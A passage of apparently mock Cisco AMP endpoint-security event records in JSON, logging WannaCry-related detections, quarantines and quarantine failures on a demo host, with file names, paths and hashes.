pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":776000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":745000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":730000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf1